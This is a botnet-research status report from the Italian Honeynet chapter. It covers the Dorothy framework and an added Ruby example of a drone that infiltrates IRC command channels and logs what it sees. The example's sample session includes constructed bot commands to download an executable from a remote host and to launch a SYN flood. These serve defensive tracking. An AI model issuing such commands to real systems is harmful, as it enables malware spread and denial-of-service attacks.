The Italian Honeynet Chapter
Status Report
Agenda
• The Italian HP chapter
• Goals achieved
• Ongoing progress
• Expected goals
• 3D-Problems
• Conclusion
The Italian HP Chapter
• Founded in 2009
• Built around the Dorothy project
– A framework for tracking botnets
• Currently composed of 4 volunteers
– Marco Riccardi: R&D Researcher @ Barcelona Digital
– Marco Cremonini: Assistant Professor @ University of Milan
– Davide Cavalca: Information Security Advisor, Freelancer
– Luigi D'Amato: CTO @ Partner Security Lab / Member @ Zone-H
Goals achieved during 2010
Goals achieved 1/3
• Java Dorothy Drone Improvement (JDrone)
– Tool for (IRC) botnet infiltration
– Totally rewritten in Java
• totally multiplatform
– yes, even on Windows!
– Distributed infrastructure
• Distributed drone instances
• One central Log Server
• One Authentication Server
The JDrone
• how does it work?
[Diagram: JDrone architecture. Several JD-Drone instances connect to the botnet C&C servers (C&C #1, C&C #2; e.g. C&C IP 11.11.11.11:6666, receiving Command#1, Command#2, Command#3), authenticate against the JD-Drone Authentication Server, send what they observe to the JD-Drone Log Server, and the collected data is displayed in the Dorothy Web GUI.]
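To make the drone's job concrete, here is an added example of the core of an IRC infiltration drone, written in Ruby (the language Dorothy is being ported to). It is not JDrone's own code. The drone answers the C&C's PING, joins the command channel once registered, and turns botmaster commands seen in PRIVMSG lines and channel topics into structured records that a drone would ship to a central log server. The C&C address, nick, channel name, botmaster nick and command syntax in the sample session are constructed for illustration; the "commands start with '.' or '!'" heuristic is an assumption, not a Dorothy rule.

```ruby
# Added example (not JDrone/Dorothy code): minimal IRC botnet drone.
# The C&C host, nick, channel, botmaster and command syntax are constructed.
require 'json'

class IrcDrone
  Record = Struct.new(:cc, :channel, :source, :command, :args, :raw)

  # Assumption: botmaster commands in this (constructed) bot family start
  # with '.' or '!'. Messages from known botmaster nicks are always kept.
  COMMAND_PREFIX = /\A[.!]/

  attr_reader :log

  def initialize(cc:, nick:, channel:, botmasters: [])
    @cc = cc
    @nick = nick
    @channel = channel
    @botmasters = botmasters
    @log = []
  end

  # Lines the drone sends first to register with the C&C (RFC 1459 style).
  def registration
    ["NICK #{@nick}", "USER #{@nick} 0 * :#{@nick}"]
  end

  # Feed one raw line received from the C&C. Returns the reply the drone
  # should send back (or nil) and logs any botmaster command it sees.
  def handle(line)
    line = line.chomp
    case line
    when /\APING :?(\S+)/                      # keep the connection alive
      "PONG :#{$1}"
    when /\A:\S+ 001 /                         # RPL_WELCOME: registered, join
      "JOIN #{@channel}"
    when /\A:(?<src>[^!\s]+)!\S+ (?<verb>PRIVMSG|TOPIC) (?<target>\S+) :(?<text>.*)\z/
      record($~[:src], $~[:target], $~[:text], line)
      nil
    when /\A:\S+ 332 \S+ (?<chan>\S+) :(?<text>.*)\z/   # RPL_TOPIC on join
      record(nil, $~[:chan], $~[:text], line)   # bots often read commands from the topic
      nil
    end
  end

  # Export the log as newline-delimited JSON for the central log server.
  def export
    @log.map { |r| JSON.generate(r.to_h.merge(drone: @nick)) }.join("\n")
  end

  private

  def record(source, target, text, raw)
    return unless text =~ COMMAND_PREFIX || @botmasters.include?(source)
    cmd, *args = text.split
    @log << Record.new(@cc, target, source, cmd, args, raw)
  end
end

# Constructed sample session as a drone would receive it from a C&C.
SAMPLE_SESSION = [
  "PING :irc.example.test",
  ":irc.example.test 001 drone42 :Welcome to the network",
  ":irc.example.test 332 drone42 #botz :.dl http://198.51.100.7/update.exe update.exe 1",
  ":m4st3r!boss@203.0.113.9 PRIVMSG #botz :.ddos.syn 198.51.100.22 80 600",
  ":someuser!u@203.0.113.10 PRIVMSG #botz :hello everyone",
].freeze

# Run a whole captured session through a drone; returns the drone and the
# replies it would have sent to the C&C.
def run_session(lines, cc:, nick:, channel:, botmasters: [])
  drone = IrcDrone.new(cc: cc, nick: nick, channel: channel, botmasters: botmasters)
  replies = lines.map { |l| drone.handle(l) }.compact
  [drone, replies]
end

if __FILE__ == $PROGRAM_NAME
  drone, replies = run_session(SAMPLE_SESSION, cc: "203.0.113.5:6667",
                               nick: "drone42", channel: "#botz",
                               botmasters: ["m4st3r"])
  puts drone.registration, replies, drone.export
end
```

Running the sample session yields two replies (the PONG and the JOIN) and two log records: the download command found in the channel topic and the DDoS command sent by the botmaster nick; the ordinary chat line is dropped. A real drone adds a socket, the authentication step against the auth server, and per-drone credentials in the exported records.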
Goals achieved 2/3
• Relationships formed
– Telecom Italia, Security Lab (Honeypot implementation, knowledge sharing)
– Barcelona Digital (Server hosting, knowledge sharing)
• Graduating student support
– Five graduating students of the University of Milan (DTI) are currently doing their final thesis on Dorothy-related sub-projects:
• The JDrone Project - Patrizia Martemucci, Andrea Cavenago
• Botnet Protocol Analysis - Marco Addario – 04/2011
• Zeus analysis/detection module - Giampaolo Dedola – 02/2011
• Low-Interaction Honeypot Implementation - Stefano Fornara – Internship in Telecom Italia Labs – 04/2011
Goals achieved 3/3
• Attended conferences
– Italian Security Summit 2010, Milan, IT
– inBot 2010, Bonn, DE
– APWG 2010, Dallas, USA* (paper presented)
• Two IEEE publications
– "The Dorothy Project: An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization" - Cremonini M., Riccardi M.
– "A framework for financial botnet analysis" - Riccardi M., Cremonini M., Oro D., Vilanova M., Luna J.
• Awards:
• Second place at "Best Italian thesis on information security", Clusit 2010
• "IEEE eCrime Fighters Scholarship Award", APWG 2010*
*Paper presented by Barcelona Digital. However, the proposed system heavily relies on a customized version of Dorothy.
Ongoing progress
Ongoing progress 1/2
• Porting to Ruby – (+ Rails ...I wish..)
• Porting the virtualization module to VMware ESXi
• Testing the first beta of the JDrone
– any volunteers for beta testing?
• Compatibility with HTTP botnets (Zeus+SpyEye as first) – For Zeus 1.x almost done
Ongoing progress 2/2
• Database migration to Postgres - almost done
• Improving visualization techniques (FlashCharts) – almost done
• Improving the Web GUI
– Improving "real time" data visualization (AJAX)
– Improving its interactiveness
– ...still waiting to kick off this task
Future Goals
“ What are we going to do tonight, Brain?”
Tactical goals
• Tool improvements
– Implement the new Dorothy framework
• Finish the database implementation
• Finish the Ruby porting phase
• Finish the new visualization module
• Execute Dorothy 24h x 7d
– Release the first beta of the JDrone
• Honeypot implementation
– Implement at least 10 new low-interaction honeypots (dionaea + mwcollectd) across USA, EU, ASIA
Strategic goals
• Presentations
• 2011 – Honeynet Project Annual Workshop – Paris (Done!)
• Presentation about the JDrone as soon as a stable version is released
• ...as many as possible!
• Publications
• One about data gathered from the new version of the framework (JDrone included)
• ...others will depend on the development progress
• Improve relationships
• Italian/Spanish universities
• Italian/Spanish CERTs
• Italian/Spanish LEAs
3D-Problems
3D-Problems
– Resources ($)
• Dorothy needs a big server for its malware analysis module
– After 3 years, we finally found it!
– Time (dT)
• The vast majority of the people involved are currently working for private companies (even the graduating students)...
• The whole project is developed entirely in spare time (very little of it!)
– Space (dS)
• 4 members, 4 cities, 4 companies, 3 countries
• Lack of coordination
Result: slow development
Conclusion
• Almost two years of development
– So far so good...
• Ongoing work
– Dorothy improvement; second version close to being released
• Expectations
– Clear and concrete goals
• Problems
– Our 3D problem vision
Let's demo!
• The Dorothy WGUI• The JDRone
Questions?
Thank you
• Marco Riccardi
– [email protected]
– [email protected]
– skype: m4rco-
• Website: – www.honeynet.it